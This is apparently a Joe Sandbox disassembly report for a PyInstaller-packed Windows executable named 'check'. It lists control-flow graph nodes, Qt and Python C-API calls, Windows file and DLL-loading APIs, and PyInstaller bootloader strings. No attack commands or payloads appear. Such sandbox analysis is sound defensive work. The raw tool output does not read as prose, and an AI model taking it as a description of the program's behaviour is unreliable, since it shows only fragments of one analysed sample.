8325->8326 8327 7ffb02ff8358 ?moveColumn@QAbstractItemModel@@QEAA_NAEBVQModelIndex@@H0H PyBool_FromLong 8326->8327 8328 7ffb02ff8391 8326->8328 8329 7ffb030002e0 8330 7ffb03000309 8329->8330 8331 7ffb03000311 8330->8331 8332 7ffb03000385 8330->8332 8333 7ffb0300035b ??MQPersistentModelIndex@@QEBA_NAEBV0@ PyBool_FromLong 8330->8333 8334 7ffb0300039b 8332->8334 8335 7ffb03000395 _Py_Dealloc 8332->8335 8335->8334 8336 7ffb02fec2e0 8337 7ffb02fec322 8336->8337 8338 7ffb02fec326 ?senderSignalIndex@QObject@ PyLong_FromLong 8337->8338 8339 7ffb02fec33e 8337->8339 8340 7ffb02f9c2e0 8341 7ffb02f9c326 8340->8341 8342 7ffb02f9c32b ?removeColumns@QTransposeProxyModel@@UEAA_NHHAEBVQModelIndex@@ 8341->8342 8343 7ffb02f9c33e 8341->8343 8342->8343 8344 7ffb02fb22e0 8345 7ffb02fb2343 8344->8345 8346 7ffb02fb23a9 8345->8346 8347 7ffb02fb2347 8345->8347 8350 7ffb02fb2440 8346->8350 8351 7ffb03062300 2 API calls 8346->8351 8348 7ffb03062300 2 API calls 8347->8348 8349 7ffb02fb2351 ?mimeTypeForData@QMimeDatabase@@QEBA?AVQMimeType@@AEBVQByteArray@@ 8348->8349 8352 7ffb02fb2389 8349->8352 8353 7ffb02fb240a ?mimeTypeForData@QMimeDatabase@@QEBA?AVQMimeType@@PEAVQIODevice@@ 8351->8353 8354 7ffb02fb243a 8353->8354 8355 7ffb02fb62e0 8356 7ffb02fb6322 8355->8356 8357 7ffb02fb6326 ?hasNext@QCborStreamReader@ PyBool_FromLong 8356->8357 8358 7ffb02fb633f 8356->8358 8359 7ffb02f702f0 8360 7ffb02f70314 PyType_IsSubtype 8359->8360 8364 7ffb02f7033d 8359->8364 8361 7ffb02f70321 8360->8361 8360->8364 8362 7ffb02f703a0 8363 7ffb02f703f9 8363->8362 8366 7ffb02f70402 PyErr_Clear 8363->8366 8364->8362 8364->8363 8365 7ffb02f703ee _Py_Dealloc 8364->8365 8365->8363 8367 7ffb02f1c2f0 8368 7ffb02f1c371 8367->8368 8369 7ffb02f1c3ec 8368->8369 8370 7ffb03062300 2 API calls 8368->8370 8371 7ffb02f1c387 ?url@QUrl@@QEBA?AVQString@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@ 8370->8371 8372 7ffb02f1c3c2 8371->8372 8381 7ffb02f342f0 8382 7ffb02f34337 8381->8382 8383 7ffb02f3433b ?checkConnectArgs@QMetaObject@@SA_NPEBD0 8382->8383 8384 7ffb02f34381 8382->8384 8385 7ffb02f3435c _Py_Dealloc 8383->8385 8386 7ffb02f34362 8383->8386 8389 7ffb02f343e9 8384->8389 8390 7ffb02f343c7 ?checkConnectArgs@QMetaObject@@SA_NAEBVQMetaMethod@@0 PyBool_FromLong 8384->8390 8385->8386 8387 7ffb02f3436d _Py_Dealloc 8386->8387 8388 7ffb02f34373 PyBool_FromLong 8386->8388 8387->8388 8391 7ffb02f322f0 8392 7ffb02f32332 8391->8392 8393 7ffb02f32336 ?enumeratorOffset@QMetaObject@ PyLong_FromLong 8392->8393 8394 7ffb02f3234e 8392->8394 6799 7ffb02fa2ef0 PyModule_Create2 6800 7ffb02fa306f 6799->6800 6801 7ffb02fa2f22 PyModule_GetDict PyImport_ImportModule 6799->6801 6802 7ffb02fa2f47 PyModule_GetDict PyDict_GetItemString 6801->6802 6803 7ffb02fa308b 6801->6803 6804 7ffb02fa2f69 _Py_Dealloc 6802->6804 6805 7ffb02fa2f72 6802->6805 6803->6800 6806 7ffb02fa3091 _Py_Dealloc 6803->6806 6804->6805 6807 7ffb02fa3074 PyErr_SetString 6805->6807 6808 7ffb02fa2f8c PyCapsule_GetPointer 6805->6808 6806->6800 6807->6803 6808->6803 6809 7ffb02fa2fac 6808->6809 6809->6803 6810 7ffb02fa303b 6809->6810 6811 7ffb02fa302d Py_FatalError 6809->6811 6810->6803 6812 7ffb02fa3056 6810->6812 6811->6810 6814 7ffb03061470 6812->6814 6815 7ffb0306148b 6814->6815 6816 7ffb030614d1 PyDict_SetItemString 6815->6816 6817 7ffb030614c3 Py_FatalError 6815->6817 6818 7ffb030614ec Py_FatalError 6816->6818 6819 7ffb030614fa 6816->6819 6817->6816 6818->6819 6820 7ffb03061511 PyDict_SetItemString 6819->6820 6821 7ffb03061503 Py_FatalError 6819->6821 6822 7ffb0306152c Py_FatalError 6820->6822 6823 7ffb0306153a 6820->6823 6821->6820 6822->6823 6867 7ffb03058400 PyType_FromSpec 6823->6867 6825 7ffb0306153f 6826 7ffb03061551 PyDict_SetItemString 6825->6826 6827 7ffb03061543 Py_FatalError 6825->6827 6828 7ffb0306156c Py_FatalError 6826->6828 6829 7ffb0306157a 6826->6829 6827->6826 6828->6829 6830 7ffb03061591 ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD 6829->6830 6831 7ffb03061583 Py_FatalError 6829->6831 6832 7ffb030615b8 6830->6832 6831->6830 6833 7ffb030615ee ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@ 6832->6833 6834 7ffb030615e4 ?registerNormalizedTypedef@QMetaType@@SAHAEBVQByteArray@@H 6832->6834 6835 7ffb03061615 ??1QByteArray@@QEAA ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD 6833->6835 6834->6835 6836 7ffb03061645 6835->6836 6837 7ffb0306166f ?registerNormalizedTypedef@QMetaType@@SAHAEBVQByteArray@@H 6836->6837 6838 7ffb03061679 ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@ 6836->6838 6839 7ffb030616a0 ??1QByteArray@@QEAA ?registerStreamOperators@QMetaType@@SAXPEBDP6AXAEAVQDataStream@@PEBX@ZP6AX1PEAX@Z 6837->6839 6838->6839 6840 7ffb030616e1 6839->6840 6841 7ffb030616f3 PyUnicode_FromString 6840->6841 6842 7ffb030616e5 Py_FatalError 6840->6842 6843 7ffb0306170c Py_FatalError 6841->6843 6844 7ffb0306171a PyUnicode_FromString 6841->6844 6842->6841 6843->6844 6845 7ffb03061741 PyUnicode_FromString 6844->6845 6846 7ffb03061733 Py_FatalError 6844->6846 6847 7ffb03061768 PyDict_New 6845->6847 6848 7ffb0306175a Py_FatalError 6845->6848 6846->6845 6849 7ffb03061784 PyUnicode_FromString 6847->6849 6850 7ffb03061776 Py_FatalError 6847->6850 6848->6847 6851 7ffb030617a7 PyDict_SetItemString 6849->6851 6852 7ffb03061799 Py_FatalError 6849->6852 6850->6849 6853 7ffb030617cc 6851->6853 6854 7ffb030617be Py_FatalError 6851->6854 6852->6851 6855 7ffb030617d2 _Py_Dealloc 6853->6855 6856 7ffb030617db PyDict_SetItemString 6853->6856 6854->6853 6855->6856 6857 7ffb03061800 6856->6857 6858 7ffb030617f2 Py_FatalError 6856->6858 6859 7ffb0306180f 6857->6859 6860 7ffb03061806 _Py_Dealloc 6857->6860 6858->6857 6868 7ffb03062300 6859->6868 6860->6859 6864 7ffb03061833 6865 7ffb03061837 Py_FatalError 6864->6865 6866 7ffb03061845 6864->6866 6865->6866 6866->6800 6867->6825 6869 7ffb0306231a malloc 6868->6869 6870 7ffb0306230b 6869->6870 6871 7ffb03061819 ??0QMutex@@QEAA@W4RecursionMode@0@ 6869->6871 6870->6869 6872 7ffb0306232a 6870->6872 6875 7ffb0305f570 PyImport_ImportModule 6871->6875 6873 7ffb03062330 Concurrency::cancel_current_task 6872->6873 6874 7ffb03062336 6872->6874 6873->6874 6876 7ffb0305f590 PyObject_GetAttrString 6875->6876 6877 7ffb0305f78e 6875->6877 6878 7ffb0305f5a9 _Py_Dealloc 6876->6878 6879 7ffb0305f5b2 6876->6879 6877->6864 6878->6879 6879->6877 6880 7ffb0305f5ce _Py_Dealloc 6879->6880 6881 7ffb0305f5d7 6879->6881 6880->6881 6882 7ffb0305f5e2 ??1QString@@QEAA 6881->6882 6883 7ffb0305f5f9 11 API calls 6881->6883 6882->6864 6884 7ffb0305f761 ??1QString@@QEAA ??1QDir@@QEAA ??1QString@@QEAA 6883->6884 6885 7ffb0305f6b9 6883->6885 6884->6864 6886 7ffb0305f6e0 ?prepend@QByteArray@@QEAAAEAV1@PEBD ?append@QByteArray@@QEAAAEAV1@PEBD 6885->6886 6889 7ffb0305f7b0 ?toLatin1@QString@@QEGBA?AVQByteArray@ 6885->6889 6887 7ffb0305f720 ?prepend@QByteArray@@QEAAAEAV1@D 6886->6887 6887->6887 6888 7ffb0305f739 ?constData@QByteArray@ ?qRegisterResourceData@@YA_NHPEBE00 6887->6888 6888->6884 6890 7ffb0305f7ce 6889->6890 6890->6886 8415 7ffb02fc62f0 8416 7ffb02fc6316 8415->8416 8417 7ffb03062300 2 API calls 8416->8417 8419 7ffb02fc634c 8416->8419 8418 7ffb02fc6324 ?current@QDir@@SA?AV1 8417->8418 8420 7ffb02fc6347 8418->8420 8421 7ffb02fb02f0 8422 7ffb02fb0308 8421->8422 8423 7ffb02fb030d 8422->8423 8424 7ffb02fb0312 PyLong_FromLong 8422->8424 8425 7ff60b139b78 8426 7ff60b139b98 8425->8426 8427 7ff60b139b81 8425->8427 8428 7ff60b139b86 _invalid_parameter_noinfo 8427->8428 8428->8426 8429 7ffb02f48300 PyList_New 8430 7ffb02f48337 8429->8430 8431 7ffb02f483a5 8429->8431 8430->8431 8432 7ffb03062300 2 API calls 8430->8432 8434 7ffb02f4838c PyList_SetItem 8430->8434 8435 7ffb02f483aa 8430->8435 8433 7ffb02f4834c ??0QXmlStreamNotationDeclaration@@QEAA@AEBV0@ 8432->8433 8433->8430 8434->8430 8434->8431 8436 7ffb02f483af ??1QXmlStreamNotationDeclaration@@QEAA 8435->8436 8437 7ffb02f483c5 8435->8437 8436->8437 8437->8431 8438 7ffb02f483cb _Py_Dealloc 8437->8438 8438->8431 8439 7ffb03052310 8440 7ffb03062300 2 API calls 8439->8440 8441 7ffb03052323 ??0QVariant@@QEAA 8440->8441 8443 7ffb030533f5 8441->8443 8444 7ffb0305342e 8443->8444 8445 7ffb0305340d ??0QVariant@@QEAA@HPEBX 8443->8445 8446 7ffb03053405 ??0QVariant@@QEAA 8443->8446 8447 7ffb03053416 ??4QVariant@@QEAAAEAV0@$$QEAV0@ ??1QVariant@@QEAA 8445->8447 8446->8447 8447->8444 8448 7ffb02f3a300 8449 7ffb02f3a316 8448->8449 8450 7ffb02f3a34d 8449->8450 8451 7ffb02f3a332 ??1QProcessEnvironment@@QEAA 8449->8451 8451->8450 8452 7ffb02f92300 8453 7ffb02f92343 8452->8453 8454 7ffb02f92359 8453->8454 8455 7ffb02f9234b ?onEntry@QState@@MEAAXPEAVQEvent@@ 8453->8455 8456 7ffb03062300 2 API calls 8454->8456 8457 7ffb02f9236b 8455->8457 8456->8457 8464 7ff60b149b80 8465 7ff60b149b9c 8464->8465 8466 7ff60b149bb3 8465->8466 8467 7ff60b149ba0 _FindPESection 8465->8467 8467->8466 8472 7ffb02f72310 8473 7ffb02f72352 8472->8473 8474 7ffb02f72377 8473->8474 8475 7ffb02f72356 ?stop@QTimer@ 8473->8475 8476 7ff60b13938c 8477 7ff60b1393b4 8476->8477 8478 7ff60b13eb98 HeapAlloc 8477->8478 8480 7ff60b1393ef 8478->8480 8479 7ff60b1393f7 8480->8479 8481 7ff60b13eb98 HeapAlloc 8480->8481 8482 7ff60b140474 _invalid_parameter_noinfo 8480->8482 8481->8480 8482->8480 8483 7ffb0300e300 8484 7ffb0300e335 8483->8484 8485 7ffb0300e344 ??0QEventLoopLocker@@QEAA 8484->8485 8486 7ffb0300e357 8484->8486 8485->8485 8485->8486 8487 7ff60b13b390 8488 7ff60b13b3ca FlsSetValue 8487->8488 8489 7ff60b13b3af FlsGetValue 8487->8489 8490 7ff60b13b3bc 8488->8490 8492 7ff60b13b3d7 8488->8492 8489->8490 8491 7ff60b13b3c4 8489->8491 8491->8488 8493 7ff60b13eb98 HeapAlloc 8492->8493 8494 7ff60b13b3e6 8493->8494 8495 7ff60b13b404 FlsSetValue 8494->8495 8496 7ff60b13b3f4 FlsSetValue 8494->8496 8495->8490 8497 7ff60b13b410 FlsSetValue 8495->8497 8496->8490 8497->8490 8498 7ffb02ff0310 8499 7ffb02ff0352 8498->8499 8500 7ffb02ff039a 8499->8500 8501 7ffb03062300 2 API calls 8499->8501 8502 7ffb02ff0365 ?persistentIndexList@QAbstractItemModel@@IEBA?AV?$QList@VQModelIndex@@@ 8501->8502 8503 7ffb02ff0390 8502->8503 8504 7ffb02f98310 8505 7ffb02f98357 8504->8505 8506 7ffb02f9835c ?mapSelectionToSource@QAbstractProxyModel@@UEBA?AVQItemSelection@@AEBV2@ 8505->8506 8507 7ffb02f9836d 8505->8507 8506->8507 8508 7ffb02fa2310 8509 7ffb02fa234d 8508->8509 8510 7ffb02fa2355 ?onEntry@QState@@MEAAXPEAVQEvent@@ 8509->8510 8511 7ffb02fa2370 8509->8511 8512 7ffb02f5c320 8513 7ffb02f5c37f 8512->8513 8514 7ffb02f5c383 ?rename@QTemporaryFile@@QEAA_NAEBVQString@@ 8513->8514 8515 7ffb02f5c3d5 8513->8515 8516 7ffb02f5c3c3 PyBool_FromLong 8514->8516 8517 7ffb02f7c320 8518 7ffb02f7c34d 8517->8518 8519 7ffb02f7c360 ??0QSize@@QEAA 8518->8519 8520 7ffb02f7c373 8518->8520 8519->8519 8519->8520 8521 7ffb02f20320 8522 7ffb02f203a5 8521->8522 8523 7ffb02f20420 8522->8523 8524 7ffb03062300 2 API calls 8522->8524 8525 7ffb02f203bb ?userName@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@ 8524->8525 8526 7ffb02f203f6 8525->8526 8527 7ffb02f1e320 8528 7ffb02f1e362 8527->8528 8529 7ffb02f1e366 ?terminate@QThread@ 8528->8529 8530 7ffb02f1e387 8528->8530 8531 7ffb02f2c320 8532 7ffb03062300 2 API calls 8531->8532 8533 7ffb02f2c32e 8532->8533 8534 7ffb02f30320 8535 7ffb02f30340 8534->8535 8536 7ffb02f30325 ??1QUrl@@QEAA 8534->8536 8536->8535 8537 7ffb02fde320 8538 7ffb02fde340 8537->8538 8539 7ffb02fde325 ??1QJsonValue@@QEAA 8537->8539 8539->8538 8540 7ffb02fc8320 8541 7ffb02fc8362 8540->8541 8542 7ffb02fc8366 ?hasUrls@QMimeData@ PyBool_FromLong 8541->8542 8543 7ffb02fc837f 8541->8543 6781 7ff60b122fe0 6783 7ff60b122ff0 6781->6783 6782 7ff60b121470 37 API calls 6782->6783 6783->6782 6784 7ff60b123207 6783->6784 6786 7ff60b12302b 6783->6786 6787 7ff60b122500 6784->6787 6788 7ff60b122536 6787->6788 6789 7ff60b12252c 6787->6789 6790 7ff60b12254b 6788->6790 6792 7ff60b129390 2 API calls 6788->6792 6791 7ff60b129390 2 API calls 6789->6791 6793 7ff60b129390 2 API calls 6790->6793 6794 7ff60b122560 6790->6794 6791->6788 6792->6790 6793->6794 6794->6786 8560 7ffb02ff6320 8561 7ffb02ff6375 8560->8561 8562 7ffb02ff63b5 8561->8562 8563 7ffb03062300 2 API calls 8561->8563 8564 7ffb02ff6383 ?fileTime@QFileDevice@@QEBA?AVQDateTime@@W4FileTime@1@ 8563->8564 8565 7ffb02ff63b0 8564->8565 8566 7ffb02f5e324 ??1QSequentialAnimationGroup@@UEAA 8567 7ffb02f5e320 8566->8567 8568 7ffb02f5e333 8566->8568 8567->8566 8577 7ffb02fb8320 8578 7ffb02fb8329 8577->8578 8579 7ffb02fb833b PyUnicode_DecodeASCII 8577->8579 8581 7ffb02fc4320 8582 7ffb02fc4362 8581->8582 8583 7ffb02fc4366 ?size@QFileInfo@ PyLong_FromLongLong 8582->8583 8584 7ffb02fc437f 8582->8584 8593 7ffb0305e320 ?startsWith@QByteArray@@QEBA_NPEBD 8594 7ffb0305e35e ?lastIndexOf@QByteArray@@QEBAHDH 8593->8594 8595 7ffb0305e61d 8593->8595 8594->8595 8596 7ffb0305e37d 8594->8596 8596->8595 8597 7ffb0305e394 ?mid@QByteArray@@QEBA?AV1@HH ?mid@QByteArray@@QEBA?AV1@HH ??0QString@@QEAA@AEBVQByteArray@@ ?qt_qFindChild_helper@@YAPEAVQObject@@PEBV1@AEBVQString@@AEBUQMetaObject@@V?$QFlags@W4FindChildOption@Qt@@@@ ??1QString@@QEAA 8596->8597 8598 7ffb0305e3ff ?methodCount@QMetaObject@ 8597->8598 8599 7ffb0305e609 ??1QByteArray@@QEAA ??1QByteArray@@QEAA 8597->8599 8601 7ffb0305e5f9 8598->8601 8602 7ffb0305e426 8598->8602 8599->8595 8601->8599 8603 7ffb0305e430 ?method@QMetaObject@@QEBA?AVQMetaMethod@@H ?methodType@QMetaMethod@@QEBA?AW4MethodType@1 8602->8603 8604 7ffb0305e5e4 ?methodCount@QMetaObject@ 8603->8604 8605 7ffb0305e453 ?methodSignature@QMetaMethod@@QEBA?AVQByteArray@ 8603->8605 8604->8601 8604->8603 8606 7ffb0305e46e 8605->8606 8607 7ffb0305e485 ?constData@QByteArray@ ?constData@QByteArray@ memcmp 8606->8607 8608 7ffb0305e5d4 ??1QByteArray@@QEAA 8606->8608 8610 7ffb0305e5da ??1QByteArray@@QEAA 8606->8610 8611 7ffb0305e521 ??1QByteArray@@QEAA 8606->8611 8612 7ffb0305e536 ??0QByteArray@@QEAA ?constData@QByteArray@ 8606->8612 8613 7ffb0305e4eb ?constData@QByteArray@ ?constData@QByteArray@ memcmp 8606->8613 8614 7ffb0305e57c ?prepend@QByteArray@@QEAAAEAV1@D ?constData@QByteArray@ ?constData@QByteArray@ ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@ ??1Connection@QMetaObject@@QEAA 8606->8614 8607->8606 8609 7ffb0305e4b4 ??1QByteArray@@QEAA 8607->8609 8608->8610 8609->8606 8610->8604 8611->8606 8612->8606 8613->8606 8614->8608 8625 7ffb02c1d014 8626 7ffb02c1d030 8625->8626 8627 7ffb02c1d035 8625->8627 8629 7ffb02c1d358 8626->8629 8630 7ffb02c1d37b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8629->8630 8631 7ffb02c1d3ef 8629->8631 8630->8631 8631->8627 6427 7ff60b135628 6428 7ff60b13565f 6427->6428 6431 7ff60b135642 6427->6431 6429 7ff60b135672 CreateFileW 6428->6429 6428->6431 6430 7ff60b1356a6 6429->6430 6435 7ff60b1356dc 6429->6435 6433 7ff60b1356bb CloseHandle 6430->6433 6434 7ff60b1356d1 CloseHandle 6430->6434 6432 7ff60b13564f _invalid_parameter_noinfo 6431->6432 6432->6435 6433->6435 6434->6435 6895 7ff60b13c014 6896 7ff60b13c06b 6895->6896 6900 7ff60b13c03d 6895->6900 6897 7ff60b13c0f9 6896->6897 6896->6900 6901 7ff60b13c134 6896->6901 6906 7ff60b1384f8 LeaveCriticalSection 6897->6906 6902 7ff60b13c15b 6901->6902 6903 7ff60b13c172 SetFilePointerEx 6902->6903 6905 7ff60b13c161 6902->6905 6904 7ff60b13c18a GetLastError 6903->6904 6903->6905 6904->6905 6905->6897

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 111 7ff60b121000-7ff60b123806 call 7ff60b12fe18 call 7ff60b12fe20 call 7ff60b12c850 call 7ff60b1353f0 call 7ff60b135484 call 7ff60b1236b0 125 7ff60b123808-7ff60b12380f 111->125 126 7ff60b123814-7ff60b123836 call 7ff60b121950 111->126 127 7ff60b123c97-7ff60b123cb2 call 7ff60b12c550 125->127 131 7ff60b12391b-7ff60b123931 call 7ff60b1245c0 126->131 132 7ff60b12383c-7ff60b123856 call 7ff60b121c80 126->132 138 7ff60b12396a-7ff60b12397f call 7ff60b122710 131->138 139 7ff60b123933-7ff60b123960 call 7ff60b127f90 131->139 136 7ff60b12385b-7ff60b12389b call 7ff60b128830 132->136 146 7ff60b12389d-7ff60b1238a3 136->146 147 7ff60b1238c1-7ff60b1238cc call 7ff60b134f30 136->147 151 7ff60b123c8f 138->151 149 7ff60b123962-7ff60b123965 call 7ff60b13004c 139->149 150 7ff60b123984-7ff60b1239a6 call 7ff60b121c80 139->150 152 7ff60b1238af-7ff60b1238bd call 7ff60b1289a0 146->152 153 7ff60b1238a5-7ff60b1238ad 146->153 158 7ff60b1239fc-7ff60b123a2a call 7ff60b128940 call 7ff60b1289a0 * 3 147->158 159 7ff60b1238d2-7ff60b1238e1 call 7ff60b128830 147->159 149->138 164 7ff60b1239b0-7ff60b1239b9 150->164 151->127 152->147 153->152 187 7ff60b123a2f-7ff60b123a3e call 7ff60b128830 158->187 168 7ff60b1238e7-7ff60b1238ed 159->168 169 7ff60b1239f4-7ff60b1239f7 call 7ff60b134f30 159->169 164->164 167 7ff60b1239bb-7ff60b1239d8 call 7ff60b121950 164->167 167->136 179 7ff60b1239de-7ff60b1239ef call 7ff60b122710 167->179 173 7ff60b1238f0-7ff60b1238fc 168->173 169->158 176 7ff60b1238fe-7ff60b123903 173->176 177 7ff60b123905-7ff60b123908 173->177 176->173 176->177 177->169 181 7ff60b12390e-7ff60b123916 call 7ff60b134f30 177->181 179->151 181->187 190 7ff60b123b45-7ff60b123b53 187->190 191 7ff60b123a44-7ff60b123a47 187->191 193 7ff60b123a67 190->193 194 7ff60b123b59-7ff60b123b5d 190->194 191->190 192 7ff60b123a4d-7ff60b123a50 191->192 195 7ff60b123a56-7ff60b123a5a 192->195 196 7ff60b123b14-7ff60b123b17 192->196 197 7ff60b123a6b-7ff60b123a90 call 7ff60b134f30 193->197 194->197 195->196 198 7ff60b123a60 195->198 199 7ff60b123b19-7ff60b123b1d 196->199 200 7ff60b123b2f-7ff60b123b40 call 7ff60b122710 196->200 206 7ff60b123aab-7ff60b123ac0 197->206 207 7ff60b123a92-7ff60b123aa6 call 7ff60b128940 197->207 198->193 199->200 202 7ff60b123b1f-7ff60b123b2a 199->202 208 7ff60b123c7f-7ff60b123c87 200->208 202->197 210 7ff60b123ac6-7ff60b123aca 206->210 211 7ff60b123be8-7ff60b123bfa call 7ff60b128830 206->211 207->206 208->151 213 7ff60b123bcd-7ff60b123be2 call 7ff60b121940 210->213 214 7ff60b123ad0-7ff60b123ae8 call 7ff60b135250 210->214 219 7ff60b123bfc-7ff60b123c02 211->219 220 7ff60b123c2e 211->220 213->210 213->211 225 7ff60b123aea-7ff60b123b02 call 7ff60b135250 214->225 226 7ff60b123b62-7ff60b123b7a call 7ff60b135250 214->226 223 7ff60b123c1e-7ff60b123c2c 219->223 224 7ff60b123c04-7ff60b123c1c 219->224 222 7ff60b123c31-7ff60b123c40 call 7ff60b134f30 220->222 234 7ff60b123c46-7ff60b123c4a 222->234 235 7ff60b123d41-7ff60b123d63 call 7ff60b1244e0 222->235 223->222 224->222 225->213 233 7ff60b123b08-7ff60b123b0f 225->233 236 7ff60b123b87-7ff60b123b9f call 7ff60b135250 226->236 237 7ff60b123b7c-7ff60b123b80 226->237 233->213 238 7ff60b123c50-7ff60b123c5f call 7ff60b1290e0 234->238 239 7ff60b123cd4-7ff60b123ce6 call 7ff60b128830 234->239 250 7ff60b123d71-7ff60b123d82 call 7ff60b121c80 235->250 251 7ff60b123d65-7ff60b123d6f call 7ff60b124630 235->251 246 7ff60b123bac-7ff60b123bc4 call 7ff60b135250 236->246 247 7ff60b123ba1-7ff60b123ba5 236->247 237->236 253 7ff60b123c61 238->253 254 7ff60b123cb3-7ff60b123cbd call 7ff60b128660 238->254 255 7ff60b123ce8-7ff60b123ceb 239->255 256 7ff60b123d35-7ff60b123d3c 239->256 246->213 266 7ff60b123bc6 246->266 247->246 264 7ff60b123d87-7ff60b123d96 250->264 251->264 261 7ff60b123c68 call 7ff60b122710 253->261 272 7ff60b123cc8-7ff60b123ccf 254->272 273 7ff60b123cbf-7ff60b123cc6 254->273 255->256 262 7ff60b123ced-7ff60b123d10 call 7ff60b121c80 255->262 256->261 274 7ff60b123c6d-7ff60b123c77 261->274 279 7ff60b123d2b-7ff60b123d33 call 7ff60b134f30 262->279 280 7ff60b123d12-7ff60b123d26 call 7ff60b122710 call 7ff60b134f30 262->280 269 7ff60b123d98-7ff60b123d9f 264->269 270 7ff60b123dc4-7ff60b123dda call 7ff60b129390 264->270 266->213 269->270 276 7ff60b123da1-7ff60b123da5 269->276 282 7ff60b123de8-7ff60b123e04 SetDllDirectoryW 270->282 283 7ff60b123ddc 270->283 272->264 273->261 274->208 276->270 277 7ff60b123da7-7ff60b123dbe SetDllDirectoryW LoadLibraryExW 276->277 277->270 279->264 280->274 286 7ff60b123e0a-7ff60b123e19 call 7ff60b128830 282->286 287 7ff60b123f01-7ff60b123f08 282->287 283->282 300 7ff60b123e1b-7ff60b123e21 286->300 301 7ff60b123e32-7ff60b123e3c call 7ff60b134f30 286->301 289 7ff60b124008-7ff60b124010 287->289 290 7ff60b123f0e-7ff60b123f15 287->290 295 7ff60b124012-7ff60b12402f PostMessageW GetMessageW 289->295 296 7ff60b124035-7ff60b124040 call 7ff60b1236a0 call 7ff60b123360 289->296 290->289 294 7ff60b123f1b-7ff60b123f25 call 7ff60b1233c0 290->294 294->274 307 7ff60b123f2b-7ff60b123f3f call 7ff60b1290c0 294->307 295->296 313 7ff60b124045-7ff60b124067 call 7ff60b123670 call 7ff60b126fc0 call 7ff60b126d70 296->313 304 7ff60b123e2d-7ff60b123e2f 300->304 305 7ff60b123e23-7ff60b123e2b 300->305 310 7ff60b123ef2-7ff60b123efc call 7ff60b128940 301->310 311 7ff60b123e42-7ff60b123e48 301->311 304->301 305->304 320 7ff60b123f41-7ff60b123f5e PostMessageW GetMessageW 307->320 321 7ff60b123f64-7ff60b123fa7 call 7ff60b128940 call 7ff60b1289e0 call 7ff60b126fc0 call 7ff60b126d70 call 7ff60b1288e0 307->321 310->287 311->310 315 7ff60b123e4e-7ff60b123e54 311->315 318 7ff60b123e56-7ff60b123e58 315->318 319 7ff60b123e5f-7ff60b123e61 315->319 323 7ff60b123e67-7ff60b123e83 call 7ff60b126dc0 call 7ff60b127340 318->323 324 7ff60b123e5a 318->324 319->287 319->323 320->321 359 7ff60b123fa9-7ff60b123fbf call 7ff60b128ed0 call 7ff60b1288e0 321->359 360 7ff60b123ff5-7ff60b124003 call 7ff60b121900 321->360 339 7ff60b123e8e-7ff60b123e95 323->339 340 7ff60b123e85-7ff60b123e8c 323->340 324->287 343 7ff60b123e97-7ff60b123ea4 call 7ff60b126e00 339->343 344 7ff60b123eaf-7ff60b123eb9 call 7ff60b1271b0 339->344 342 7ff60b123edb-7ff60b123ef0 call 7ff60b122a50 call 7ff60b126fc0 call 7ff60b126d70 340->342 342->287 343->344 357 7ff60b123ea6-7ff60b123ead 343->357 353 7ff60b123ebb-7ff60b123ec2 344->353 354 7ff60b123ec4-7ff60b123ed2 call 7ff60b1274f0 344->354 353->342 354->287 367 7ff60b123ed4 354->367 357->342 359->360 372 7ff60b123fc1-7ff60b123fd6 359->372 360->274 367->342 373 7ff60b123fd8-7ff60b123feb call 7ff60b122710 call 7ff60b121900 372->373 374 7ff60b123ff0 call 7ff60b122a50 372->374 373->274 374->360
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
